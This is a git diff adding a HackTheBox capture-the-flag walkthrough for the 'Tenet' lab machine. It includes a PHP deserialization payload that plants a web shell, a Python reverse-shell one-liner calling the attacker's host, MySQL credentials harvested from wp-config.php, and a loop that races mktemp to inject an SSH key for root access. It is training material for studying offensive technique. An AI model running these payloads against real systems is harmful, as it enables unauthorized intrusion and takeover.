diff --git a/HackTheBox/Tenet.md b/HackTheBox/Tenet.md
new file mode 100644
index 0000000..56ccc9a
--- /dev/null
+++ b/HackTheBox/Tenet.md
@@ -0,0 +1,290 @@
+# HackTheBox-Tenet
+
+## Rustscan
+
+```bash
+rustscan -a 10.10.10.223 -- -A -sC -sV
+.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
+| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
+| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
+`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
+The Modern Day Port Scanner.
+________________________________________
+: https://discord.gg/GFrQsGy :
+: https://github.com/RustScan/RustScan :
+ --------------------------------------
+Nmap? More like slowmap.đ˘
+[~] The config file is expected to be at "/root/.rustscan.toml"
+[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
+[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
+Open 10.10.10.223:22
+Open 10.10.10.223:80
+
+PORT STATE SERVICE REASON VERSION
+22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDA4SymrtoAxhSnm6gIUPFcp1VhjoVue64X4LIvoYolM5BQPblUj2aezdd9aRI227jVzfkOD4Kg3OW2yT5uxFljn7q/Mh5/muGvUNA+nNO6pC
+C0tZPoPEwMT+QvR3XyQXxbP6povh4GISBySLw/DFQoG3A2t80Giyq5Q7P+1LH1f/m63DyiNXOPS8fNBPz59BDEgC9jJ5Lu2DTu8ko1xE/85MLYyBKRSFHEkqagRXIYUwVQASHgo3OoJ+VAcBTJZH
+1TmXDc4c6W0hIPpQW5dyvj3tdjKjlIkw6dH2at9NL3gnTP5xnsoiOu0dyofm2L5fvBpzvOzUnQ2rps2wANTZwZ
+| 256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLMM1BQpjspHo9teJwTFZntx+nxj8D51/Nu0nI3atUpyPg/bXlNYi26boH8zYTrC6fWepgaG2G
+ZigAqxN4yuwgo=
+| 256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMQeNqzXOE6aVR3ulHIyB8EGf1ZaUSCNuou5+cgmNXvt
+80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
+| http-methods:
+|_ Supported Methods: POST OPTIONS HEAD GET
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
+```
+
+## PORT 80 (HTTP)
+
+Visting the web page it shows default apache web page
+
+
+
+Running `dirsearch`
+
+
+
+Now this doesn't loads css so looking at the source it shows the there's a domain
+
+`tenet.htb`
+
+
+
+Adding this to `/etc/hosts` file
+
+
+
+We can see some posts on the main page
+
+
+
+```python
+Weâre looking for beta testers of our new time-management software, âRotasâ
+
+âRotasâ will hopefully be coming to market late 2021, pending rigorous QA from our developers, and you!
+
+For more information regarding opting-in, watch this space.
+
+Published December 16, 2020 By [protagonist]
+```
+
+```python
+Weâre moving our data over from a flat file structure to something a bit more substantial. Please bear with us whilst we get one of our devs on the migration, which shouldnât take too long.
+
+Thank you for your patience
+
+Published December 16, 2020 By [protagonist]
+```
+
+This post had a comment
+
+```python
+[neil]
+
+[December 16, 2020 at 2:53 pm]
+
+did you remove the sator php file and the backup?? the migration program is incomplete! why would you do this?!
+```
+
+So we have some information that there are two users neil and protagonist also there's a php file and backup folder
+
+We could have alternatively done this through `wpscan`
+
+
+
+
+
+I tried bruteforcing through wpscan but it didn't found any password
+
+
+
+
+Going back to that apache default page I tried to include `sator.php` and got something
+
+
+
+If we focus on the comment which was made on the post "the sator php file and the backup"
+
+
+
+We will get a backup file for `staor.php`
+
+```php
+';
+ $this-> data = 'Success';
+ }
+
+
+ public function __destruct()
+ {
+ file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
+ echo '[] Database updated
';
+ // echo 'Gotta get this working properly...';
+ }
+}
+
+$input = $_GET['arepo'] ?? '';
+$databaseupdate = unserialize($input);
+
+$app = new DatabaseExport;
+$app -> update_db();
+
+
+?>
+
+```
+
+
+## PHP Deserlization attack
+
+We can see here that there's a class `DatabaseExport` in which there are two public variables `user_file` and `data` and in this class there's a public function called `update_db()` which will set the `data` variable to "sucess" which is just a text as you can see from the sator.php show on the web browser at the end there's a magic function `__destruct()` which will be automatcially called when an object is destroyed , there the `user_file` will be made with the contents from `data` and will put in the web directory which means users.txt will be created in the web directory having the data "success".
+
+At the end we can the `GET` parameter `arepo` , now here exists a vulnerability which is known as** PHP Deserilization**
+
+So to exploit this we have to modify the class variables in this case `user_file` and `data` and seriliaze it , once we get the serliazed string we pass it to `arepo` paramter.
+
+
+
+After running it we will get a php serialized object
+
+
+
+But we need to pass this to GET paramter in a url encoded form so I used cyberchef to do that
+
+
+
+And then paste into the GET parameter
+
+```bash
+http://10.10.10.223/sator.php?arepo=O:14:%22DatabaseExport%22:2:%7Bs:9:%22user_file%22;s:9:%22shell.php%22;s:4:%22data%22;s:29:%22%3C?php%20system($_GET%5B%22cmd%22%5D);?%3E%22;%7D
+```
+
+
+
+We can see the message "Database updated" so let's see if `shell.php` was made on the web directory or not.
+
+
+
+
+
+And we have a rce, cool !
+
+
+
+Python3 is installed so we can get a reverse shell through it
+
+```bash
+http://10.10.10.223/shell.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.198",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
+```
+
+
+
+Stabilize the shell
+
+
+
+Let's check the cron jobs
+
+
+
+Open ports
+
+
+
+## Escalating to user
+
+We see mysql running on localhost so we can try to find creds for mysql and since wordpress is hosted the creds are in `wp-config.php` file
+
+
+
+
+
+```bash
+/** MySQL database username */
+define( 'DB_USER', 'neil' );
+/** MySQL database password */
+define( 'DB_PASSWORD', 'Opera2112' );
+
+/** MySQL hostname */
+define( 'DB_HOST', 'localhost' );
+
+```
+
+The db user is `neil` so this is interesting as neil is also the user on the linux machine so let's try this password
+
+
+
+## Privilege Escalation
+
+Doing `sudo -l` we can see what we run as sudo
+
+
+
+Reading the contents of the bash script
+
+
+
+Here these functions are not that interesting , if we go to the bottom
+
+
+
+We can see a function `addkey()` in which a temporary file is being made with command `mktemp`
+
+
+
+If we run this command on our local machine to see what file name it generates we can see that the file name it's pretty unique everytime this command runs
+
+
+
+On the target machine it also generates a random name
+
+
+
+
+In the script that file is being removed but that's the file need to put in our ssh public key so we need to run a loop in which we try to put our public key in every file that starts with `ssh` so we have to utilize wildcard here ( * )
+
+
+So our one liner script should look like this
+
+```bash
+while true; do var=$(ls /tmp |grep ssh);echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzKK/Hru6t4lA0tu4CX8E3BzkM8Bl7cFxyheVBHZS+flyqq
+/sZuRfPHCQE2LNL5IgRfHDljFO4MuiYJgrMr8jCA+stDBxGAhCiRZ4UmZ7OYn1abGGOmtUyaCYvJp3pizvcyVIJsNBQBSk1JETfopgKCydtXfbXYF8kukjM29AVbIoD99UAmo8Qm1RDv+cguO+0q
+Tg1vHMErURIyM/P3fhNakGL2F1/rENpvqB7EK06N6KYLujCf9Y87slTCU33gHoo5iG5mX5JFi2pBhWJnOQECjaeEsTjvKKvgIX7wy14b3I4b7fLstsXg69CCE9KF5Zr1uWYP0JGG1pB0OrDH4LPj
+MRxDALCKMnA4F8OrSmTzfgWJ9LhxxFHh73ExsfGJYypBuSOxh+4UBSuF5znPbJo315Qd05LEcpCAv623vqjsUDQUEMeJVz0NiWkGCuJIxt+YTGinB9hDj58seHsI4yMZe5HtY5cQJLR09/fVoGPi
+ebD/lFk68jQFonJs73NlPE= root@kali' | tee $var ;done
+```
+
+We are running a while loop infinite number of times and in there we have a variable which is grabbing the name of the random generated ssh file , next we are printing our public ssh key and piping it to that file and logging it with the help of `tee`
+
+So first I will run the `enableSSH` script
+
+
+
+Then will run my one liner bash script
+
+
+
+
+
+After running it for some time and terminated both the scripts and in the `/tmp` folder you will see those randomly generated ssh file , some of them will have no content as the temp file gets deleted.
+
+
+
+Try to ssh in the target machine using ssh private key
+
+
\ No newline at end of file